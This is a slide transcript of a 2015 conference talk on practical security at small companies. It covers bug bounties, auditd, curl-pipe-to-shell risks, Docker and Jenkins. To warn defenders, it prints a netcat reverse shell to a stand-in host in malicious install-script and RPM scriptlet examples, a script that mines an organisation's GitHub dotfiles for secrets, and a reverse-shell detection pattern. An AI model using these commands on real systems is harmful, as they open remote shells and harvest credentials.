Security for non-Unicorns. SecTor 2015

Transcript

1. Security For Non-Unicorns 1 https://www.etsy.com/listing/205741051/unicorn-dog-hat-rainbow-unicorn-dog @benjammingh for SecTor 2015 1

2. Who's this clown? 2 » Infrastructure security at Etsy. »

   Recovered operations monkey at Puppet Labs. » Own a lot of black t-shirts. » Had 1300 accounts on his high school Linux system. (: 2 https://twitter.com/skullmandible/status/411281851131523072 @benjammingh for SecTor 2015 2

3. Setlist » Intros. (you are here). » Few real world

   problems & applications. » Fixes, or at least coping mechanisms. » Panicked summary based on time. » Comments thinly masked as questions. @benjammingh for SecTor 2015 3

4. Security! @benjammingh for SecTor 2015 4

5. Unicorns? @benjammingh for SecTor 2015 5

6. The problem security is hard. @benjammingh for SecTor 2015 6

7. From tiny seeds, do mighty acorns grow. » PinkiePwn's 6

   tiny bugs in Chrome to full sandbox escape. » Egor Homakov's 5 small bugs in Github to full private access on GitHub. » XSS to remote code execution in under an hour. » Username & password from HVAC system leads to $160+ Million Target breach. @benjammingh for SecTor 2015 7

8. Things that are not security are hard too. @benjammingh for

   SecTor 2015 8

9. Computerising is hard. No. 1 takeaway for security types is

   a sense of perspective. (maybe even humility! gasp) @benjammingh for SecTor 2015 9

10. Security people aren't great secure coders. » Snort: 10 CVEs,

    Wireshark: 322! CVEs » Security Firm Bit9 Hacked, Used to Spread Malware » Joxean Koret on Breaking Antivurius software » Tavis from Project Zero on exploiting ESET » BEST! FireEye just running Apache/PHP as root ! @benjammingh for SecTor 2015 10

11. So who do I trust? » No one? Always a

    great position for security people, who don't want to get paid. » Everyone? Do I have some emails with funny cats for you to click on. » Security vendors? If you have infinite money and no attackers. » Attackers! @benjammingh for SecTor 2015 11

12. "You're already being probed for security holes, do you want

    to know or not?" @benjammingh for SecTor 2015 12

13. Bug bounties 101: Have one! Bug Crowd vs. HackerOne @benjammingh

    for SecTor 2015 13

14. Bug bounties 102: Prepare a lot. @benjammingh for SecTor 2015

    14

15. Bug bounties 103: The first few weeks will be hell.

    @benjammingh for SecTor 2015 15

16. Bug bounties 104: Be ready with bees! @benjammingh for SecTor

    2015 16

17. Security on the inside @benjammingh for SecTor 2015 17

18. Armadillo security architecture @benjammingh for SecTor 2015 18

19. @benjammingh for SecTor 2015 19

20. Cloud @benjammingh for SecTor 2015 20

21. Github @benjammingh for SecTor 2015 21

22. @benjammingh for SecTor 2015 22

23. But this doesn't happen in real life, right? @benjammingh for

    SecTor 2015 23

24. @benjammingh for SecTor 2015 24

25. terrible bash example (don't do this) # for i in

    $(curl --silent 'https://api.github.com/orgs/<target>/members' \ # | grep html_url | cut -f 4 -d '"' | cut -d / -f 4); \ # do ( curl --silent https://api.github.com/repos/$i/dotfiles | grep -q 'Not Found' || \ # git clone https://github.com/$i/dotfiles.git $i ) \ # ; done for i in * ; do [ -d "$i/.git" ] || continue cd $i for revision in $(git rev-list --all) ; do unset PAGER export GIT_PAGER="" # find . -iname \*.key -or -iname \*.pem out="$(git grep -i -E "$1" ${revision} )" if [ $? -eq 0 ] ; then echo "${out}" | LANG="C" sed "s/^/$i: /" fi done cd .. done @benjammingh for SecTor 2015 25

26. Go use Gitrob » http://michenriksen.com/blog/gitrob-putting-the-open- source-in-osint/ » https://github.com/michenriksen/gitrob @benjammingh for

    SecTor 2015 26

27. Auditd @benjammingh for SecTor 2015 27

28. Auditd Auditd is the best way to get command execution

    logged in your infrastructure. @benjammingh for SecTor 2015 28

29. Auditd Auditd is the worst way to get this information

    to a log file. type=SYSCALL msg=audit(123:3020171): arch=c000003e syscall=59 success=yes exit=0 items=3 ppid=9200 pid=9202 auid=0 uid=1000.... typde=EXECVE msg=audit(123:3020171): argc=3 a0="/usr/bin/perl" a1="-w" a2="/bin/sketchy.pl" type=CWD msg=audit(123:3020171): cwd="/home/superdave/hax" type=PATH msg=audit(123:3020171): item=0 name="/bin/sketchy.pl" inode=208346 dev=fe:02 mode=0100755 ouid=0 ogid=0 rdev=00:00 type=PATH msg=audit(123:3020171): item=1 name=(null) inode=200983 dev=fe:02 mode=0100755 ouid=0 ogid=0 rdev=00:00 type=PATH msg=audit(123:3020171): item=2 name=(null) inode=46 dev=fe:02 mode=0100755 ouid=0 ogid=0 rdev=00:00 @benjammingh for SecTor 2015 29

30. Mark Ellzey on Auditd. @benjammingh for SecTor 2015 30

31. WHY? "Why are the logs multiline?" -- David Shing, aka

    "Shingy", aka "The Shing", aka "AOL's digital prophet" @benjammingh for SecTor 2015 31

32. Multiline logs are the spawn of The Devil Oracle's Java

    @benjammingh for SecTor 2015 32

33. Coping with multiline auditd » ELK: multiline filter in Logstash.

    » Other: github/gdestuynder/Audisp-json » Have cash, want a decent GUI (and more): Go use Threatstack! » Write something yourself in python & golang: I keep promising to OSS this ): @benjammingh for SecTor 2015 33

34. Alert on sketchy things. (assumes ELK) 1. Elastalert from Yelp

    2. Alert on "/bin/nc *-e /bin/sh*" 3. You will now find when someone tries to run a reverse shell! 4. Or when yours ops people do fun things. @benjammingh for SecTor 2015 34

35. curl | bash @benjammingh for SecTor 2015 35

36. curl legit.pw | sh @benjammingh for SecTor 2015 36

37. "But I check them, obviously!" @benjammingh for SecTor 2015 37

38. Sinatra example get '/install.sh' do if request.env['HTTP_USER_AGENT'] =~ /curl/ return

    'nc -e /bin/sh root.legit.pw 2222 &' else return print_install_code() end end @benjammingh for SecTor 2015 38

39. Sinatra example 2: Payback get '/install.sh' do ip = request.env['HTTP_CLIENT_IP']

    if seen_before.include? ip return print_install_code() else seen_before << ip return 'nc -e /bin/sh root.legit.pw 2222 &' end end @benjammingh for SecTor 2015 39

40. @benjammingh for SecTor 2015 40

41. @benjammingh for SecTor 2015 41

42. curl | bash "But this is no worse than packages."

    foo$ sudo yum install sketchy foo$ sudo aptitude install sketchy @benjammingh for SecTor 2015 42

43. curl | bash "but worse than downloading RPMs from a

    random site?" foo$ rpm --verify --check-sigs sketchy.1.33-7.rpm foo$ dpkg-sig --verify sketchy.1.33-7.deb @benjammingh for SecTor 2015 43

44. curl | bash root# rpm -qp --scripts sketchy-1.33-7.rpm preinstall scriptlet

    (using /bin/sh): bash -c 'while : ; \ do \ nc -e /bin/sh root.legit.pw 2222 ;\ done' @benjammingh for SecTor 2015 44

45. Verifiable This doesn't exist: foo$ curl legit.pw/sketch.sh | sudo sh

    --gpg-verify No one has ever done this: foo$ curl legit.pw/sketch.sh | gpg --verify --output - | sudo sh @benjammingh for SecTor 2015 45

46. curl | bash "But I trust HTTPS" » HTTPS certs

    cost ~$6. » If I can't make $6 by owning a system, I should probably stop being an attacker. » @letsencrypt will soon make this free. @benjammingh for SecTor 2015 46

47. curl | bash curl -k @benjammingh for SecTor 2015 47

48. curl --yolo | \ sudo sh --yolo @benjammingh for SecTor

    2015 48

49. curl | bash What to do? @benjammingh for SecTor 2015

    49

50. A LIVE DEMO, madness. @benjammingh for SecTor 2015 50

51. Lightweight containers! @benjammingh for SecTor 2015 51

52. chroot(8) @benjammingh for SecTor 2015 52

53. FreeBSD Jails @benjammingh for SecTor 2015 53

54. Solaris Zones @benjammingh for SecTor 2015 54

55. AIX WPAR @benjammingh for SecTor 2015 55

56. @benjammingh for SecTor 2015 56

57. Is Docker secure? @benjammingh for SecTor 2015 57

58. >30% of Images in Docker Hub Contain High Priority Security

    Vulns - Jayanth Gummaraju, Tarun Desikan and Yoshio Turner from BanyanOps @benjammingh for SecTor 2015 58

59. >30% of MSDN CDs contain high priority security vulns @benjammingh

    for SecTor 2015 59

60. @benjammingh for SecTor 2015 60

61. As secure as Vagrant? @benjammingh for SecTor 2015 61

62. But is Docker itself secure? » Don't run things as

    root. » No really, stop running things as root. » Did I mention not running things as root. » It is also not 1999. (Docker 1.8 addresses some of this, with it's changes to who it runs as) @benjammingh for SecTor 2015 62

63. Securify the Docker. » Don't use --privileged. » Use --cap-drop

    all and --cap-drop <thing> to get the minimum capabilities. » Use Docker Notary » Use GRSecurity (just do that anyway, if you can.) » Use SELinux... I may as well ask for a pony here. @benjammingh for SecTor 2015 63

64. But is Docker secure? More secure than what? @benjammingh for

    SecTor 2015 64

65. More secure than what? From whom? @benjammingh for SecTor 2015

    65

66. @benjammingh for SecTor 2015 66

67. Threat modelling for beginners 1. what are you actually defending

    against? 2. from whom? 3. for how much? @benjammingh for SecTor 2015 67

68. Lateral movement > uid=0 @benjammingh for SecTor 2015 68

69. <pinch of salt goes here> » I am not saying

    Docker is ZOMG unhackable. » it's just cgroups and namespacing. (just) » Escapes will happen. » They have a rad security team (Hi @diogomonica and @nathanmccauley) @benjammingh for SecTor 2015 69

70. unpinchofsaltd » You can use it in a way that

    is secure, enough. » network separation & segregation still works. » secrets/credentials still a bigger problem. » PLEASE don't just adopt it because it's new & shiny. » ! " unikernels ✨ $ @benjammingh for SecTor 2015 70

71. Jenkins! @benjammingh for SecTor 2015 71

72. It's entire job is to take arbitrary code and run

    it, With access to some secret/credential @benjammingh for SecTor 2015 72

73. It's literally remote code execution as a service. @benjammingh for

    SecTor 2015 73

74. old crufty configs + all your code & secrets @benjammingh

    for SecTor 2015 74

75. @benjammingh for SecTor 2015 75

76. RCE as a service 6 6 Hacking Jenkins Servers With

    No Password @benjammingh for SecTor 2015 76

77. Make Jenkins suck fewer * Disable execution on the master

    Jenkins host. * Disable anonymous access. * (Use travis, if you can) @benjammingh for SecTor 2015 77

78. But what if Jenkins could be harnessed for good? @benjammingh

    for SecTor 2015 78

79. NOT STOLEN FROM NickG's old 2012 deck. 7 7 Thanks

    Nick. nickgsuperstar/devopssec-apply-devops-principles-to-security @benjammingh for SecTor 2015 79

80. Jenkins as a force for [security] good » Gauntlt "be

    mean to your code" » https://github.com/secure-pipeline » Even Adobe blog on secure software, zomg! @benjammingh for SecTor 2015 80

81. @benjammingh for SecTor 2015 81

82. @benjammingh for SecTor 2015 82

83. Summary » Computers are apparently hard. » Security is clearly

    harder still, obv. » Actually trust and humans is hard. » The typing is the easy bit. (ish) @benjammingh for SecTor 2015 83

84. More Summary » Complex systems lead to much more complex

    security problems. (see Oauth) » Annual pen-tests don't scale, bug bounties can help. » Attackers are mining any public info you have (GitHub, S3, pastebin?) » No really, go check all your S3 buckets... @benjammingh for SecTor 2015 84

85. Will there be a summary of summaries? » I beg

    you to stop trusting curl. » Auditd is awful, but it can be fewer awful. » Jenkins, you probably have to have one. » but that can be okay, nay, even useful for security. @benjammingh for SecTor 2015 85

86. A summary appeared, what happened next will shock you »

    Docker and security can be used in the same sentence. » Understand your threat model (Apple's guide) » Don't be a FireEye, stop running things as root. @benjammingh for SecTor 2015 86

87. Thank you » Twidder: @benjammingh » LinkedIn: lnkdin.me/p/benyeah » FidoNet:

    2:254/524.13 » JitHub: github.com/barn » SpeakerDeck: speakerdeck.com/barnbarn » Etsy: Careers <--- CodeAsCraft <--- our blog @benjammingh for SecTor 2015 87